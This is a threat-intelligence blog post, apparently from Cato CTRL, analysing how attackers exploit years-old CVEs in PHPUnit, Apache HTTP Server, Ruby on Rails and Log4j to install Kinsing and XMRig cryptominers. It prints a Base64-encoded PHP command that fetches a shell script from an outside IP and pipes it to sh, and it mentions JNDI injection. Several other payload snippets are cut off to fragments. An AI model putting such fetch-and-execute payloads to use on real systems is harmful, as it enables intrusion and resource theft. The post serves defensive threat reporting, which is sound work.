March 5, 2025 6m read

Cato CTRL Threat Research: Stuck in the Past – How Hackers Exploit Years-Old CVEs for Cryptojacking

Vitaly Simonovich
Vitaly Simonovich

Table of Contents

Wondering where to begin your SASE journey?

We've got you covered!
Listen to post:
Getting your Trinity Audio player ready...

Executive Summary 

While organizations focus on addressing the latest zero-day threats, threat actors continue to profit by targeting weaknesses that should have been resolved long ago. Some of these Common Vulnerability and Exposures (CVEs) date back nearly a decade, yet they remain heavily exploited today. This trend proves that old flaws never truly disappear.

Cato CTRL continuously monitors threats in real time, and our latest analysis of inbound traffic over the past 90 days (November 2024 – February 2025) revealed a concerning trend: threat actors are still leveraging long-standing vulnerabilities for cryptojacking. We are observing threat actors leveraging the Kinsing malware and XMRig for illicit mining of Monero.

We define inbound as traffic that doesn’t originate from within a network but attempts to enter the perimeter of a network.

Whether it involves a forgotten PHPUnit test file, a misconfigured Apache server, or an unpatched Log4j instance, these vulnerabilities remain prime targets for threat actors.

Top_10_exploited_CVEs

Figure 1. Top 10 exploited CVEs for inbound traffic for the past 90 days (November 2024 – February 2025)

Let’s take a closer look at the four most exploited vulnerabilities from Figure 1 and how they continue to fuel cybercrime.

Cato IPS, as part of the Cato SASE Cloud Platform, actively detects and blocks the attacks mentioned in this blog. This helps protect customers from all Cato-connected edges including sites, remote users, and cloud resources.

Technical Overview 

CVE-2017-9841: PHPUnit Command Injection Vulnerability

Vulnerability: Command injection (remote code execution)

Affected Product: PHPUnit (versions ≤ 5.6.2)

Impact: Allows attackers to execute arbitrary PHP code on the server

Affected Component: eval-stdin.php in PHPUnit’s testing framework

Attack Vector: Remote, via specially crafted requests

Severity: Critical

Percentage of total attacks: 24%

Summary: PHPUnit’s eval-stdin.php file flaw allows unauthenticated remote attackers to execute arbitrary commands on the host system. This affects applications that include PHPUnit as a development dependency but expose it in production environments.

CVE-2017-9841

Figure 2. CVE-2017-9841 exploitation patterns over time

This vulnerability is actively exploited, with multiple IPs targeting various victims. Our analysis shows that attackers primarily leverage this flaw to deploy cryptojacking malware, using a well-defined exploitation chain.

For instance, one observed attacker (92[.]255[.]57[.]58) exposed port 9000, which, when accessed, returned the response:

eval -i 1 —

c2hlbGxfZXhlYygnY3VybCBodHRwOi8vMTk0LjM4LjIwLjIvZXguc2h8c2gnKTs=

Upon decoding, it reveals a PHP shell execution command:

shell_exec

This command downloads and executes a bash script, which ultimately installs the Kinsing malware, which is used to mine cryptocurrency illicitly.

CVE-2021-41773: Apache HTTP Server Path Traversal & RCE

Vulnerability: Path traversal and remote code execution (RCE)

Affected Product: Apache HTTP Server 2.4.49 (and 2.4.50 under certain conditions)

Impact: Unauthorized file access and potential remote code execution

Affected Component: Path normalization in request processing

Attack Vector: Remote, via crafted requests

Severity: Critical

Percentage of total attacks: 17%

Summary: A flaw in Apache HTTP Server 2.4.49 allows attackers to exploit a path traversal vulnerability (../) to access arbitrary files outside the document root. If CGI scripts are enabled, this can lead to remote code execution. The issue was not properly patched in 2.4.50, making it still exploitable under specific configurations.

CVE-2021-41773

Figure 3. CVE-2021-41773 exploitation patterns over time

During our analysis of CVE-2021-41773 exploitation attempts, we observed a significant volume of attacks delivering XMRig (a Monero mining tool).

One such payload involved the following command:

X=$

This command attempts to fetch and execute a shell script from a remote server (94[.]156[.]177[.]109). The script is designed to establish persistence and deploy XMRig, covertly utilizing system resources for unauthorized cryptocurrency mining.

By exploiting this Apache vulnerability, attackers can gain unauthorized access to sensitive files and, in misconfigured environments, execute arbitrary code. When combined with cryptojacking payloads like XMRig, this leads to severe performance degradation, increased power consumption, and potential financial loss for affected organizations.

CVE-2014-0130: Ruby on Rails Directory Traversal

Vulnerability: Directory traversal

Affected Product: Ruby on Rails (versions before 4.1.0 and certain 3.x versions)

Impact: Unauthorized file access and potential information disclosure

Affected Component: Render method in Action View

Attack Vector: Remote, via specially crafted requests

Severity: High

Percentage of total attacks: 15%

Summary: A flaw in Ruby on Rails allows attackers to exploit improper file handling in the render method, enabling directory traversal attacks. By crafting malicious requests, an attacker can access arbitrary files on the server, potentially exposing sensitive application data.

CVE-2014-0130

Figure 4. CVE-2014-0130 exploitation patterns over time

Attackers are actively exploiting CVE-2014-0130, a directory traversal vulnerability in Ruby on Rails, to gain unauthorized access to sensitive system files. Our analysis revealed numerous attempts to retrieve critical configuration files such as:

winnt

These files provide valuable insights into the operating system version, architecture, and system configurations, which threat actors can leverage to escalate their attacks. By understanding the environment, they can tailor their exploitation techniques, deploy additional malware, or establish persistent access.

Although this vulnerability primarily enables information disclosure, it serves as an entry point for further compromise, making it a significant security risk—especially for servers running outdated or unpatched Rails versions.

CVE-2021-44228: Apache Log4j Remote Code Execution (Log4Shell)

Vulnerability: Remote code execution (RCE)

Affected Product: Apache Log4j (versions 2.0-beta9 to 2.14.1)

Impact: Allows unauthenticated remote attackers to execute arbitrary code

Affected Component: JNDI lookup in Log4j logging mechanism

Attack Vector: Remote, via malicious log data (e.g., user input, headers)

Severity: Critical

Percentage of total attacks: 10%

Summary: A critical flaw in Apache Log4j allows remote attackers to inject malicious JNDI lookups similar to the following code: 

${jn

This leads to arbitrary code execution. This affects a wide range of Java applications using vulnerable Log4j versions and can be exploited via various input sources such as HTTP headers, chat messages, or database logs.

CVE-2021-44228

Figure 5. CVE-2021-44228 exploitation patterns over time

Our analysis revealed widespread scanning activity targeting CVE-2021-44228, commonly known as Log4Shell, as attackers search for vulnerable applications. Beyond reconnaissance, we observed multiple attempts to exploit this vulnerability to deploy XMRig (a Monero mining tool).

One such exploitation attempt used the following payload:

t('$

When Base64-decoded, this payload executes the following command:

curl

This script downloads and installs XMRig, effectively hijacking system resources to mine Monero without the victim’s consent. The long encoded string at the end represents a Monero wallet address, where mined cryptocurrency is deposited.

Why Are Old Vulnerabilities Still Being Exploited?

Attackers are continuing to exploit two vulnerabilities: CVE-2017-9841 (PHPUnit Remote Code Execution) and CVE-2014-0130 (Ruby on Rails Directory Traversal). This is largely due to the prevalence of outdated and misconfigured software in many systems.

The issue with PHPUnit’s remote code execution occurs because its test suite, intended for development purposes, is often mistakenly left exposed in production environments. This oversight allows attackers to execute arbitrary PHP commands remotely. Additionally, legacy Ruby on Rails 3.x applications are still in use, supported by long-term service offerings.

These vulnerabilities have become “commodity” threats, incorporated into botnets and various attacker toolkits. As long as unpatched software remains in production, attackers will continue to exploit these old vulnerabilities, which require minimal effort to exploit but offer high rewards.

Conclusion

Cato CTRL’s analysis highlights that threat actors continue to exploit old and unpatched vulnerabilities for financial gain. These persistent threats, often leveraged for cryptojacking, do not steal or encrypt data but silently hijack system resources. The impact is far-reaching—causing performance degradation, increased energy consumption, and hardware strain, ultimately affecting productivity and driving up operational costs.

Organizations must not underestimate these vulnerabilities. Cryptojacking may operate in the background, but its effects are very real, leading to system instability, financial losses, and heightened security risks. Effective mitigation requires continuous monitoring, proactive patching, and strong cybersecurity awareness to prevent unauthorized resource exploitation.

Protections 

Cato IPS, as part of the Cato SASE Cloud Platform, actively detects and blocks the attacks mentioned in this blog. This helps protect customers from all Cato-connected edges including sites, remote users, and cloud resources.  

Related Topics

Wondering where to begin your SASE journey?

We've got you covered!
Vitaly Simonovich

Vitaly Simonovich

Vitaly Simonovich, Threat Intelligence Researcher, Cato Networks. Member of Cato Ctrl. He is based in Israel and has more than eight years of experience in the field of cybersecurity, with a focus on application and data security. Previously, Vitaly worked at Incapsula and Imperva, where he led teams of security analysts and researchers. Apart from his work, Vitaly is an active contributor to the cybersecurity community. He regularly publishes research blogs and webinars, and also presents at various security conferences. He is passionate about teaching cybersecurity to others and is teaching at local colleges. In his free time, he enjoys solving Capture The Flag (CTF) challenges, which helps him to enhance his skills.

Read More